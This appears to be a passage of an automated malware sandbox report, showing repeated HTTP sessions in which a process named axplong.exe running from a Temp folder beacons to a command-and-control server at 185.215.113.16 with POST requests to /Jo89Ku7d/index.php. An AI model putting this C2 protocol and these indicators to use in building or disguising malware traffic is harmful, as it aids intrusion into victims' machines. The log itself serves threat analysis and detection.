                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  15192.168.2.549727185.215.113.16801408C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 19:52:20.153104067 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:20.855324984 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:20 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:20.856623888 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:21.084162951 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:20 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  16192.168.2.549728185.215.113.16801408C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 19:52:21.202054024 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:21.909286976 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:21 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:21.910269022 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:22.138643026 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:22 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  17192.168.2.549729185.215.113.16801408C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 19:52:22.346460104 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:23.061089993 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:22 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:23.061784029 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:23.288800955 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:23 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  18192.168.2.549730185.215.113.16801408C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 19:52:23.402973890 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:24.131936073 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:24 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:24.132808924 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:24.365736961 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:24 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  19192.168.2.549731185.215.113.16801408C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 19:52:24.480401039 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:25.188328981 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:25 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:25.189460039 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:25.411484957 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:25 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  20192.168.2.549732185.215.113.16801408C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 19:52:25.527410030 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:26.247225046 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:26 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:26.248262882 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:26.479299068 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:26 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  21192.168.2.549733185.215.113.16801408C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 19:52:26.589998007 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:27.286318064 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:27 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:27.287940025 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:27.512229919 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:27 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  22192.168.2.549734185.215.113.16801408C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 19:52:27.623887062 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:28.384051085 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:28 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:28.384829998 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:28.615612030 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:28 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  23192.168.2.549735185.215.113.16801408C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 19:52:28.730205059 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:29.421099901 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:29 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:29.421895981 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:29.645183086 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:29 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  24192.168.2.549736185.215.113.16801408C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 19:52:29.763433933 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:30.470469952 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:30 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:30.471194983 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:30.743355989 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:30 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  25192.168.2.549737185.215.113.16801408C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 19:52:30.855334997 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:31.571554899 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:31 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:31.572357893 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:31.796993971 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:31 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  26192.168.2.549738185.215.113.16801408C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 19:52:32.118624926 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:32.835402966 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:32 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:32.836201906 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:33.063921928 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:32 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
